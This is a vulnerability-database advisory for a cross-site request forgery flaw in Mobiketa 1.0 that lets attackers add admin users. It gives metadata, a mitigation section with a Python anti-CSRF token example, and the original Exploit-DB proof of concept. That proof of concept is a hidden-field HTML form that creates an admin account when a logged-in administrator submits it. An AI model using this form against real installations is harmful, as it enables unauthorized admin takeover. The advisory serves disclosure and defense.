Vendor: Mobiketa
By: Murat YILMAZLAR
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery (CSRF))
Product Name: Mobiketa
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:ynetinteractive:mobiketa:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2016

Mobiketa – CSRF Add Admin Exploit

A CSRF vulnerability exists in Mobiketa 1.0 that allows an attacker to add an admin user to the application. The attacker crafts a malicious HTML page containing a form whose hidden fields carry the parameters required to add an admin user; when a logged-in administrator's browser is made to submit that form, the request reaches the vulnerable application together with the victim's session and the new admin account is created. The attacker can then log in to the application as an admin user.

Mitigation:

The application should implement an anti-CSRF token: a per-session secret embedded in its own forms and verified on every state-changing request, with any request that lacks a valid token rejected.
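The following is an added example, not code from the advisory or from Mobiketa, showing what the mitigation above looks like in practice: a synchronizer-token check simulated in Python instead of PHP. The handler name, the `csrf_token` field name and all form values are assumptions; the form field names (`is_admin`, `name`, `email`, `username`, `password`, `id`, `update`) are the ones the PoC posts.

```python
# Added example (not part of the original advisory or of Mobiketa): a minimal
# synchronizer-token CSRF check around a simulated "add/update user" handler.
import hmac
import secrets

CSRF_FIELD = "csrf_token"  # hypothetical hidden-field / session key name


def issue_csrf_token(session: dict) -> str:
    """Create a random per-session token (once) and return it so the server can
    embed it in its own 'add user' form as a hidden field."""
    if CSRF_FIELD not in session:
        session[CSRF_FIELD] = secrets.token_urlsafe(32)
    return session[CSRF_FIELD]


def csrf_token_valid(session: dict, form: dict) -> bool:
    """True only if the form carries a token equal to the session's token.
    hmac.compare_digest keeps the comparison constant-time."""
    expected = session.get(CSRF_FIELD)
    submitted = form.get(CSRF_FIELD)
    if not expected or not submitted:
        return False  # token missing on either side: reject
    return hmac.compare_digest(expected, submitted)


def handle_user_update(session: dict, form: dict, users: dict) -> tuple:
    """Stand-in for the index.php?url=user POST handler. The CSRF check runs
    before any state change, so a forged cross-site POST never touches the
    user table even though the victim's session cookie travelled with it."""
    if not csrf_token_valid(session, form):
        return 403, "CSRF token missing or invalid"
    if not session.get("is_admin"):
        return 403, "admin privileges required"
    username = form.get("username", "")
    if not username:
        return 400, "username required"
    users[username] = {
        "name": form.get("name", ""),
        "email": form.get("email", ""),
        "is_admin": form.get("is_admin") == "1",
    }
    return 200, f"user {username} saved"


def demo() -> dict:
    """Runs a forged request shaped like the PoC and a legitimate one against
    the same admin session; returns the outcomes for inspection."""
    users = {}
    admin_session = {"user": "admin", "is_admin": True}  # constructed session
    token = issue_csrf_token(admin_session)

    # Constructed: the attacker's hidden-field form. It cannot contain the
    # token because the attacker's page never sees the victim's session.
    forged_form = {
        "is_admin": "1", "name": "forged user", "email": "forged@example.invalid",
        "username": "forged", "password": "placeholder", "id": "15", "update": "\r",
    }
    forged = handle_user_update(admin_session, forged_form, users)

    # Constructed: the same fields submitted from the application's own form,
    # which the server rendered with the session token embedded.
    legit_form = dict(forged_form, username="newadmin", **{CSRF_FIELD: token})
    legit = handle_user_update(admin_session, legit_form, users)

    # Constructed: a forged form carrying a guessed token of the wrong value.
    guessed_form = dict(forged_form, **{CSRF_FIELD: "x" * 43})
    guessed = handle_user_update(admin_session, guessed_form, users)

    return {"forged": forged, "legit": legit, "guessed": guessed, "users": users}


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

The token must be random per session and compared against the server-side copy; a static or predictable value gives no protection, and the check has to sit in front of every request that changes state, not only the one this PoC targets.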

Exploit-DB raw data:

<!--
# Exploit Title: Mobiketa - CSRF Add Admin Exploit
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://www.ynetinteractive.com/mobiketa/
# Version: 1.0

# Exploit:

< -- bug code started -- >
-->

<html>
  <body>
    <form action="[SITE]/[mobiketa_path]/index.php?url=user" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="is&#95;admin" value="1" />
      <input type="hidden" name="name" value="murat&#32;y" />
      <input type="hidden" name="email" value="murrat&#64;protonmail&#46;com" />
      <input type="hidden" name="username" value="murrat" />
      <input type="hidden" name="password" value="123123123" />
      <input type="hidden" name="id" value="15" />
      <input type="hidden" name="update" value="&#13;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<!--
< -- end of the bug code -- >

#########################

[+] Contact: http://twitter.com/muratyilmazlarr
-->